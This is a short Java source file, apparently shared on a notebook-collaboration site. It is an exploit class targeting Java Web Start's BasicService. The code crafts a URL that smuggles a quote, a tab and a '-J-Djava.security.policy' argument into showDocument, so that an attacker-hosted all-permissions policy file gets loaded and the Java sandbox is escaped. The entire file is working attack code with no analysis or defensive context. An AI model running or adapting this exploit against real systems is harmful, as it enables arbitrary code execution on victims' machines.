Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
import java.net.URL;
2

3
import javax.jnlp.BasicService;
4
import javax.jnlp.ServiceManager;
5

6
/**
7
 * 
8
 * This class exploits the vulnerability within the BasicServiceImpl class.
9
 * @author mka
10
 *
11
 */
12

13
public class BasicServiceExploit {
14

15
	public static void main(String[] args) {
16
		if (args == null || args.length < 1) {
17
			System.exit(1);
18
		}
19
		String path = args[0];
20

21
		BasicService bs;
22

23
		try {
24

25
			URL url = new URL(path + "/exploit.jnlp\"" + ((char) 9)
26
					+ "\"-J-Djava.security.policy=" + path + "/all.policy");
27

28
			bs = (BasicService) ServiceManager
29
					.lookup("javax.jnlp.BasicService");
30
			bs.showDocument(url);
31

32
		} catch (Exception e) {
33
			e.printStackTrace();
34
		}
35
	}
36
}
37

38